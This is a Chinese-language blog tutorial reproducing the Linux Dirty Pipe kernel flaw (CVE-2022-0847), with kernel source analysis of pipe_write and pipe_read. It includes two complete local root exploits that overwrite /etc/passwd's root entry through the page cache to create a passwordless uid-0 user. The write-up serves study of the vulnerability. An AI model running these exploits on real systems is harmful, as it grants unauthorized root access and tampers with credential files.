dirty pipe(CVE-2022-0847)漏洞复现

复现一下 dirty pipe漏洞

漏洞简介

漏洞发现者 Max Kellermann 并不是专门从事漏洞挖掘工作的，而是在服务器中多次出现了文件错误的问题，用户下载的包含日志的gzip文件多次出现CRC校验位错误, 排查后发现CRC校验位总是被一段ZIP头覆盖。

根据作者介绍, 可以生成ZIP文件的只有主服务器的一个负责HTTP连接的服务，但是该服务并没有写 gzip 文件的权限。即主服务器同时存在一个 writer 进程与一个 splicer 进程, 两个进程以不同的用户身份运行, splicer进程并没有写入writer 进程目标文件的权限, 但存在 splicer 进程的数据写入文件的 bug 存在。

有兴趣可以看看漏洞发现者写的原文。作者竟然是从一个小小的软件bug一步一步深挖到了内核漏洞，实在是佩服作者的这种探索精神。

环境准备

这里我按照自己复现准备的一个真实状态来写。

首先是准备一个被漏洞影响的版本内核，这里我使用了 5.8.0-63-generic 版本。本来之前打算直接 Ubuntu20.04LTS 一了百了，但是发现它内核有自动更新，下过来就是最新的，漏洞已经被修复了。所以这里直接用这个讲讲换这个内核的版本。

首先 apt 寻找这个版本：

1	apt-cache search linux \| grep 5.8.0-63

然后我们在列表中寻一下

再用 apt 安装这个内核

1	sudo apt install linux-image-5.8.0-63-generic

安装完成之后， reboot 重启，开机界面按 shift+TAB 进入 ubuntu 引导界面，然后选择高级选项 advance，选择我们刚刚安装的那个内核进入启动。

成功替换指定的版本。

前置芝士

pipe

匿名管道，用于作为一个读写数据的通道，参数给一个长度为 2 的 int 数组，并通过这个数组返回，创建成功则返回对应的读写描述符，一端只能用于读，一端只能写。

#include<fcntl.h>
#include<stdio.h>

int main(){
    char buffer[10];
    int pipe_fd[2]={-1,-1};
    pipe(pipe_fd);
    write(pipe_fd[1],"AAAA",4);
    read(pipe_fd[0],buffer,4);
    write(1,buffer,4);
}
/*
AAAA
*/

Splice

splice用于在两个文件描述符之间移动数据，也是零拷贝。

函数原型是：

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

参数解释：

fd_in：输入文件描述符
fd_out：输出文件描述符
len：移动字节长度
flags：控制数据如何移动。

返回值：

>0：表示成功移动的字节数
==0：表示没有字节可以移动
<0：表示出现某些错误

#include<stdio.h>
#include<unistd.h>
#include<stdlib.h>
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <assert.h>  
#include <errno.h>  
#include <string.h>  
#include <fcntl.h> 

int main(){
    int pipe_fd[2]={-1,-1};
    pipe(pipe_fd);
    write(pipe_fd[1],"AAAA",4);
    splice(pipe_fd[0],NULL,1,NULL,4,0);
}
/*
AAAA
*/

bug复现

做完上面两个前置芝士之后，应该能对 pipe 和 splice 稍微有点理解了，那么我们来复现一下 paper 上面说的 bug。把两个服务简化一下写出这两个程序：

创建一个 tmpfile，user 属主，权限 755。

//server1,user运行的服务，生成可执行文件为 p1
#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
char file[]="./tmpfile";
int main(){
    int p[2]={-1,-1};
    int fd=open(file,O_WRONLY);
    int i=2000;
    while(i--){
        write(fd,"AAAAA",5);
    }
    printf("write over\n");
}

下面这个是要准备去写之前准备的那个文件了。

//server2,hacker运行的服务，生成可执行文件为p2
#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<string.h>
char file[]="./tmpfile";
int main(){
    
    int p[2]={-1,-1};
    int fd=open(file,O_RDONLY);
    char buffer[4096];
    memset(buffer,0,4096);
    if(pipe(p))abort();
    int nbytes1,nbytes2;
    while(1){
        nbytes1=splice(fd,NULL,p[1],NULL,5,0);
        nbytes2=write(p[1],"BBBBB",5);
        read(p[0],buffer,10);
        if(nbytes1==0||nbytes2==0)break;
    }
    close(fd);
}

我们这么操作：

先使用 user 用户创建一个 tmpfile，运行 p1 文件。

在这个文件中我们写了 5000 个 A，并且权限归 user 所有，只有它有写的权限。

切换回 hacker 用户，运行 p2 文件，我们发现 tmpfile 中间居然出现了 BBBBB。

这就证明了这个漏洞的存在，这个漏洞的危害在于：只要文件可读，那我就可以写，这是非常危险的。

但是，我们不做任何操作，重启机器之后发现文件又变回了全 A 的状态。这说明，p2程序对tmpfile文件的修改仅存在于系统的页面缓存(page cache)中。

但是这个页面缓存在内核中，我们打开的文件会短暂停留在 page cache 当中，一段时间内我们打开的文件就相当于这个 page cache 的内容，所以我们更改了 page cache 其实也是可以达到修改文件的目的的。

exploit以及分析

这里我根据了我自己对这个漏洞的理解写了一个便于我们获取 root 权限的 exploit。

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
#define PIPE_SIZE PAGE_SIZE*16

void SetCanMerge(int fd[2]){
    char buf;
    pipe(fd);
    for(int i=0;i<PIPE_SIZE;i++){
        write(fd[1],"a",1);
        read(fd[0],&buf,1);
    }
}

int main(){
    int pipefd[2];
    SetCanMerge(pipefd);
    int fd=open("/etc/passwd",O_RDONLY);
    splice(fd,NULL,pipefd[1],NULL,1,0);    
    write(pipefd[1],"oots:",5);
    system("su roots");
}

一步一步分析一下它的 exp。

首先我用了一个 SetCanMerge 函数去填满 pipe，这一步的作用是走完一遍 pipe 的缓冲区。pipe 的缓冲区是以页为单位的，总共是 16 页的环形缓冲区。这一步就是去设置所有 page 的 Can Merge 属性。这个 Can Merge 标识了这个 pipe 能否被续写。

我们先来介绍一下续写的概念，续写就是说在我总共 16 页的缓冲区中，我写了一个字符，那么它会被存储在下标为 0 的页的首地址中，我第二次写的时候会写在哪里呢？两个选择，一个是紧跟着后面去写，第二个是在后一页去写，显然为了内存考虑我们大部分会选择紧跟着后面去写，因为总共 16 页，不可能我扔了 16 个字符进管道管道直接就满了。所以我们设置了一个 flags ，它们当中有一位就是标志了是否能在上面续写。

显然我一个一个往里面去丢字符，它肯定会把 16 个页都设置为可以续写，所以这一步就是把 pipe 缓冲区都设置为可续写。第二步我们打开了一个 /etc/passwd 文件，这个文件所有用户可读，只有 root 用户可写，我们以只读的方式打开它获得一个文件描述符，然后通过 splice 向管道中拷贝一个字节的内容。

这里的拷贝一个字节因为是零拷贝，所以它不是真正的拷贝，而是直接把缓存页给挂到了 pipe 缓冲区当中。然而此时 Can Merge 属性又存在，所以我们再往管道里写数据的时候，会因为 Can Merge 而直接写 Page Cache 绕过了权限检查。

于是我们向 /etc/passwd 的第二个字节起写上五个字节 oots:，这样的话 /etc/passwd 的第一行变成了 roots::...，原本第一行的内容为 root:x:...，中间的 x 表示此用户有密码，而我们把 x 取消掉了，那么我们生成了一个 uid 为 0 且没有密码的用户 roots，那么我们通过 su roots 就能直接切换到 root 权限。

内核源码分析

调试环境搭建

这段时间搭建 Kernel Pwn 环境，刚好有时间来做一下源码分析，首先选取对应的内核版本，这里我用了 5.13.19。

首先环境搭建好建议先用 exp 去试试看看漏洞是否存在，这里我使用exp，的确是存在的。

那么我们就开始调试了。

这里提一嘴，我们编译的时候不要勾选 Reducing Debugging Information，不然 vmlinux 将不含结构体信息，调试的难度会大大增加。

pipe源码分析

对于pipe来说，最重要的是读和写对应的调用，它们在内核层名为 pipe_read 和 pip_write，在 /source/fs/pipe.c 当中有完整的定义。

pipe_write

我们先来看看 pipe_write。

函数完整的声明是：

1	static ssize_t pipe_write(struct kiocb iocb, struct iov_iter from);

我们一段一段来分析。

第一部分

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    unsigned int head;
    ssize_t ret = 0;
    size_t total_len = iov_iter_count(from);
    ssize_t chars;
    bool was_empty = false;
    bool wake_next_writer = false;

    /* Null write succeeds. */
    if (unlikely(total_len == 0))
        return 0;
    //...
}

第一个分支是如果 total_len==0 则直接 return 0，就是如果没有可写的数据，那么直接返回 0。

而中间的一个函数调用 iov_iter_count 仅仅是取得 iov_iter 中的 count 属性作为返回值，from 望文生义可以理解为是数据从哪里来（from），如果来的数据个数为 0 那么直接结束这次调用。

第二部分

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    //...
    __pipe_lock(pipe);

    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        ret = -EPIPE;
        goto out;
    }

    #ifdef CONFIG_WATCH_QUEUE
    if (pipe->watch_queue) {
        ret = -EXDEV;
        goto out;
    }
    #endif

    /*
	 * If it wasn't empty we try to merge new data into
	 * the last buffer.
	 *
	 * That naturally merges small writes, but it also
	 * page-aligns the rest of the writes for large writes
	 * spanning multiple pages.
	 */
    head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;

        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);
            if (ret)
                goto out;

            ret = copy_page_from_iter(buf->page, offset, chars, from);
            if (unlikely(ret < chars)) {
                ret = -EFAULT;
                goto out;
            }

            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }
    //...
}

先给这个管道上锁，然后判断如果 pipe 对象的 reader 为 0，那么直接给进程发送一个 SIGPIPE，通过查阅资料可得，大部分情况下，该信号会在写一个关闭一个 socket 对象时得到，那么这里同理，可能该管道已经关闭，但是仍往里面写数据。

随后这里的注释提到，如果给出的数据非空，那么尝试将新的数据写入缓冲区。随后这里进行一个判断，这里需要解释这里做的一个运算 chars = total_len & (PAGE_SIZE-1);，PAGE_SIZE 通常情况下来说大小是 4096，刚好是一个 2 的 12 次幂，那么再 -1 相当于就是二进制的 12 个 1，再用 & 运算就是取得 total_len 最低的 12 位，如果管道非空（环形队列判非空仅仅是判 tail 和 head是否相等），且写入长度最低 12 位为 0（这个判断等价于写入的长度不为页的整数倍，可以理解为是 total_len % PAGE_SIZE!=0，但是取模运算挺浪费时间的所以转为位运算），那么执行这个分支。

在分支里面的运算中，先获取 mask 掩码，值为 pipe->ring_size-1，其实跟前面取掩码差不多的道理，通常这个值是 16，也就是环形缓冲区的大小，通过调试输出也可以得到

随后取得环形缓冲区的头部的前一个（循环队列通常是取模，这里 head&mask 同样等效于 (head-1) % 16，至于为什么 -1，则是为了取得头部的前一个管道，来判断一下该管道是否可续写）。这里可以大胆猜测是在头部（head）写，尾部（tail）读。随后又进行一个判断 buf->flags & PIPE_BUF_FLAG_CAN_MERGE 是很常见的取标记位，可以理解为缓冲区 PIPE_BUF_FLAG_CAN_MERGE 设置为 1，这里其实就是前面讲的，判断缓冲区是否可续写，后面的再跟一个判断 offset + chars <= PAGE_SIZE，这里也很好理解，chars 我们前面说了就是我本次写入长度对页大小的余数（除去这个长度，其余部分肯定是页大小的整数倍了），如果这个余数加上 offset 在 PAGE_SIZE 之内，简单点讲，就是该页可以续写，且余数部分写入该页不会造成溢出，则执行后面的分支。

那么紧接着一步，先判断 pipe_buf_confirm，这个函数的定义如下：

/**
 * pipe_buf_confirm - verify contents of the pipe buffer
 * @pipe:	the pipe that the buffer belongs to
 * @buf:	the buffer to confirm
 */
static inline int pipe_buf_confirm(struct pipe_inode_info *pipe,
                                   struct pipe_buffer *buf)
{
    if (!buf->ops->confirm)
        return 0;
    return buf->ops->confirm(pipe, buf);
}

可以直接看给的注释，就是验证管道缓冲区的内容，这里向下再找一层找到这个成员函数 confirm 的定义说明

/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error.  If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

判断缓冲区的内容是否为 good，如果为 0 则是 good，其实我也没想到它内容能怎么检查，可能检查是否错误，不过通常来说这个错误不会发生。

随后会执行 copy_page_from_iter(buf->page, offset, chars, from);，这一部分其实还是比较明显的，就是把数据的余数部分拷贝到缓冲区内，追加到 offset 之后，因为缓冲区里原本还有 offset 的数据。

通常来讲，拷贝了那么多，返回值一定也是那么多，随后校验返回值是否正确，然后给缓冲区长度加上拷贝的字节数。随后再提取要写的字节数，这里 copy_page_from_iter 肯定是会把 from 对象的 count 进行相应的减少的，所以如果后面没有数据了，那么直接结束就可以了。

第三部分

这一部分是一个很大的 for 循环，我们来看一下。

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    //...
    for (;;) {
        if (!pipe->readers) {
            send_sig(SIGPIPE, current, 0);
            if (!ret)
                ret = -EPIPE;
            break;
        }

        head = pipe->head;
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;

            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }

            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock);

            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) {
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }

            pipe->head = head + 1;
            spin_unlock_irq(&pipe->rd_wait.lock);

            /* Insert it into the buffer array */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;

            copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
            if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += copied;
            buf->offset = 0;
            buf->len = copied;

            if (!iov_iter_count(from))
                break;
        }

        if (!pipe_full(head, pipe->tail, pipe->max_usage))
            continue;

        /* Wait for buffer space to become available. */
        if (filp->f_flags & O_NONBLOCK) {
            if (!ret)
                ret = -EAGAIN;
            break;
        }
        if (signal_pending(current)) {
            if (!ret)
                ret = -ERESTARTSYS;
            break;
        }

        /*
        * We're going to release the pipe lock and wait for more
        * space. We wake up any readers if necessary, and then
        * after waiting we need to re-check whether the pipe
        * become empty while we dropped the lock.
        */
        __pipe_unlock(pipe);
        if (was_empty)
            wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
        kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
        wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
        __pipe_lock(pipe);
        was_empty = pipe_empty(pipe->head, pipe->tail);
        wake_next_writer = true;
    }
    //...
}

首先判断 reader 是否有效。随后判管道是否慢，不满则向下执行，其实判满的条件仅仅是 head-pipe->tail>=pipe->max_usage 。其实这里的 max_usage 大概率也是常量 16，验证一下，果然如此。

其实这里也不是很明白为什么一样的常量要用两个代替，客观来说，这两者意思是差不多的。然后分析一下如果不满的情况，先分配一个临时页。随后 spin_lock_irq(&pipe->rd_wait.lock); 上读的锁 spin_lock_irq 的宏定义其实就是上锁，可以再源码中找到。

1	#define spin_lock_irq(x) pthread_mutex_lock(x)

意思其实就是写的时候不能读，防止调度问题读在写之前发生了。

随后判断，如果管道满，那么解锁直接下次循环，如果管道不满，则 head 向前，将分配的页面插入到这个缓冲区内，并初始化这个缓冲区（len和offset都置零）。

is_packetized 应该是判断这个是否为网络数据包，如果是则设置标志位，否则设置标志位为可续写。用完这个页之后，把临时页指针置空防止被重复用到。随后拷贝一个页从 from 过来，后面当然也是判断拷贝的字节是否为一个页的大小。随后该缓冲区的 offset 置零，len 置为页的大小。如果没有要拷贝的数据了，则直接退出。

如果管道不满则继续如上流程，否则判断，如果管道设置为不能阻塞（O_NONBLOCK），则直接返回错误，否则挂起当前进程，等待数据被读走有空间。

随后释放管道的锁，允许其他线程或进程访问管道。如果在锁被释放之前管道为空，唤醒等待读取的进程。这通过调用 wake_up_interruptible_sync_poll 函数实现。

1 2	#define wake_up_interruptible_sync_poll(x, m) \ __wake_up_sync_key((x), TASK_INTERRUPTIBLE, poll_to_key(m))

接下来向管道的异步读取进程发送 SIGIO 信号，通知它们有新的数据可用。wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe)); 用于判断管道是否可写，否则阻塞在这里，然后重新获取管道的锁，标记下一个写入者需要唤醒。

这就是这一段代码的所有操作。

最后一部分

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    //...
out:
    if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
        wake_next_writer = false;
    __pipe_unlock(pipe);

    /*
    * If we do do a wakeup event, we do a 'sync' wakeup, because we
    * want the reader to start processing things asap, rather than
    * leave the data pending.
    *
    * This is particularly important for small writes, because of
    * how (for example) the GNU make jobserver uses small writes to
    * wake up pending jobs
    *
    * Epoll nonsensically wants a wakeup whether the pipe
    * was already empty or not.
    */
    if (was_empty || pipe->poll_usage)
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
    if (wake_next_writer)
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
    if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
        int err = file_update_time(filp);
        if (err)
            ret = err;
        sb_end_write(file_inode(filp)->i_sb);
    }
    return ret;
}

如果管道满，下一个写者不需要唤醒（因为唤醒了也是阻塞）随后释放锁。后面一段代码跟前面for的后面差不多，主要有一个更新文件的操作，先获取文件写锁，然后再更新文件的时间戳，最后释放该锁。

总结

整个管道写的代码就分析的差不多了，小结一下流程。

若管道不为空且写入的数据长度不为 PAGE_SIZE的整数倍，那么尝试续写。
否则将数据按页拷贝到管道上面，期间可能会挂起进程等待读者取数据。
最后更新管道写的文件。

可能会有一个疑问，那就是如果管道为空且长度不为 PAGE_SIZE 整数倍那么它按页拷贝会不会导致拷贝不出 PAGE_SIZE 大小的数据，这里我猜测，copy_page_from_iter 确实是这样的，不足 PAGE_SIZE 的数据填充 0 直接拷贝过来，就不续写了。

事实如何还得稍后深入分析 copy_page_from_iter 的源码。

pipe_read

读的源码其实非常简单，我们同样也来一点一点分析。

第一部分

static ssize_t
    pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
    size_t total_len = iov_iter_count(to);
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    bool was_full, wake_next_reader = false;
    ssize_t ret;

    /* Null read succeeds. */
    if (unlikely(total_len == 0))
        return 0;

    ret = 0;
    __pipe_lock(pipe);

    /*
	 * We only wake up writers if the pipe was full when we started
	 * reading in order to avoid unnecessary wakeups.
	 *
	 * But when we do wake up writers, we do so using a sync wakeup
	 * (WF_SYNC), because we want them to get going and generate more
	 * data for us.
	 */
    was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
    //...
}

依然先特判读取长度是否为 0。然后锁上管道，判断管道是否满。

第二部分

static ssize_t
    pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
    for (;;) {
        unsigned int head = pipe->head;
        unsigned int tail = pipe->tail;
        unsigned int mask = pipe->ring_size - 1;

        #ifdef CONFIG_WATCH_QUEUE
        if (pipe->note_loss) {
            struct watch_notification n;

            if (total_len < 8) {
                if (ret == 0)
                    ret = -ENOBUFS;
                break;
            }

            n.type = WATCH_TYPE_META;
            n.subtype = WATCH_META_LOSS_NOTIFICATION;
            n.info = watch_sizeof(n);
            if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
                if (ret == 0)
                    ret = -EFAULT;
                break;
            }
            ret += sizeof(n);
            total_len -= sizeof(n);
            pipe->note_loss = false;
        }
        #endif

        if (!pipe_empty(head, tail)) {
            struct pipe_buffer *buf = &pipe->bufs[tail & mask];
            size_t chars = buf->len;
            size_t written;
            int error;

            if (chars > total_len) {
                if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
                    if (ret == 0)
                        ret = -ENOBUFS;
                    break;
                }
                chars = total_len;
            }

            error = pipe_buf_confirm(pipe, buf);
            if (error) {
                if (!ret)
                    ret = error;
                break;
            }

            written = copy_page_to_iter(buf->page, buf->offset, chars, to);
            if (unlikely(written < chars)) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += chars;
            buf->offset += chars;
            buf->len -= chars;

            /* Was it a packet buffer? Clean up and exit */
            if (buf->flags & PIPE_BUF_FLAG_PACKET) {
                total_len = chars;
                buf->len = 0;
            }

            if (!buf->len) {
                pipe_buf_release(pipe, buf);
                spin_lock_irq(&pipe->rd_wait.lock);
                #ifdef CONFIG_WATCH_QUEUE
                if (buf->flags & PIPE_BUF_FLAG_LOSS)
                    pipe->note_loss = true;
                #endif
                tail++;
                pipe->tail = tail;
                spin_unlock_irq(&pipe->rd_wait.lock);
            }
            total_len -= chars;
            if (!total_len)
                break;	/* common path: read succeeded */
            if (!pipe_empty(head, tail))	/* More to do? */
                continue;
        }

        if (!pipe->writers)
            break;
        if (ret)
            break;
        if (filp->f_flags & O_NONBLOCK) {
            ret = -EAGAIN;
            break;
        }
        __pipe_unlock(pipe);

        /*
		 * We only get here if we didn't actually read anything.
		 *
		 * However, we could have seen (and removed) a zero-sized
		 * pipe buffer, and might have made space in the buffers
		 * that way.
		 *
		 * You can't make zero-sized pipe buffers by doing an empty
		 * write (not even in packet mode), but they can happen if
		 * the writer gets an EFAULT when trying to fill a buffer
		 * that already got allocated and inserted in the buffer
		 * array.
		 *
		 * So we still need to wake up any pending writers in the
		 * _very_ unlikely case that the pipe was full, but we got
		 * no data.
		 */
        if (unlikely(was_full))
            wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
        kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);

        /*
		 * But because we didn't read anything, at this point we can
		 * just return directly with -ERESTARTSYS if we're interrupted,
		 * since we've done any required wakeups and there's no need
		 * to mark anything accessed. And we've dropped the lock.
		 */
        if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
            return -ERESTARTSYS;

        __pipe_lock(pipe);
        was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
        wake_next_reader = true;
    }
    //...
}

紧接着跟一个 for 循环，中间包着一个宏可以不用管，这个应该没有编译进去。

先判是否非空，如果非空说明可以读数据，这里也不赘述取尾部缓冲区的操作了，不明白可以看前面的详细讲解。取出来之后呢，判断，如果该缓冲区数据的长度大于读取字节数 chars > total_len，那么说明这个缓冲区的数据已经够了，读取所需要的字节数就不需要管了，中间判一个标记字段，如果设置了这个标记且还没有读过数据（ret==0）那么报错退出，如果仅仅设置了标记，那么就直接 break。若没设置，则将取出的缓冲区长度设置为读取长度 chars=total_len。

随后再判一下缓冲区内容是否 good，将整个缓冲区拷贝给用户。若 total_len>chars，则拷贝 chars（缓冲区长度），否则把 chars 设置为要读取的总长度并读取这么多。然后设置一下缓冲区的 offset 和 len，其实这里差不多可以理解 offset 和 len 字段的具体含义了。

len：缓冲区还有多少数据。
offset：缓冲区的数据从哪里开始。

紧接着判，如果是一个分组管道，也就是网络管道，那么清除整个页并直接退出。

后面判断，如果读取完成之后缓冲区没数据了（同时，网络管道在这里设置为 0 就一定可以进这个分支），那么直接清除这个页。随后上读锁，让 tail++。如果没有要读取数据了，那么退出，随后看看如果还有要读取数据且管道不为空，则继续循环（continue）。

之后的分支都是处理管道为空的情况，不管是经历了一次读或者没有经历过读，都到这里来。判断写者还在不在，如果不在那么退循环，已经读取了若干数据也退循环，主要是没有经历过读 ret==0，那么在这里就一定能要给它一点数据，倘若管道设置为不能阻塞 O_NONBLOCK，那么直接返回错误。

后面的其实跟写差不多，但是这里有点不太明白，如果到这里没有读出数据的话，大概率是管道为空。那么需要唤醒写者来写些数据上去。如果管道满，那么唤醒下一个读者。

第三部分

static ssize_t
    pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
    //...
    if (pipe_empty(pipe->head, pipe->tail))
        wake_next_reader = false;
    __pipe_unlock(pipe);

    if (was_full)
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
    if (wake_next_reader)
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
    if (ret > 0)
        file_accessed(filp);
    return ret;
}

如果管道为空，那么不唤醒下一个读者。最后就是判断如果读取字节大于0，那么更新文件访问时间。

总结

遍历循环队列的列，如果能全读那么全读整个页并释放该页数据，并继续下个页的遍历。
长度不足以读完整个页，那么读部分直接退出。
根据管道情况选择唤醒读者或者写者。

EXP重写方案

前面写的 EXP 虽然能成功，但是还不够完善，因为经过调试之后，发现 set_can_merge 这里不需要遍历整个 pipe 缓冲区，正如前面分析的，如果管道为空或者读取字节为 PAGE_SIZE 整数倍，那么都直接复制页，不选择续写，所以我们连着读写 16 次就可以给所有的缓冲区打上 PIPE_BUF_FLAG_CAN_MERGE 标志。

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
#define PIPE_SIZE 16

void SetCanMerge(int fd[2]){
    char buf;
    pipe(fd);
    for(int i=0;i<PIPE_SIZE;i++){
        write(fd[1],"a",1);
        read(fd[0],&buf,1);
    }
}

int main(){
    int pipefd[2];
    SetCanMerge(pipefd);
    printf("[+]set all pipe page can merge done\n");
    int fd=open("/etc/passwd",O_RDONLY);

    int ret=splice(fd,NULL,pipefd[1],NULL,1,0);
    printf("[+]splice done,return value=%d\n",ret);    
    write(pipefd[1],"oots:",5);
    system("su roots");
}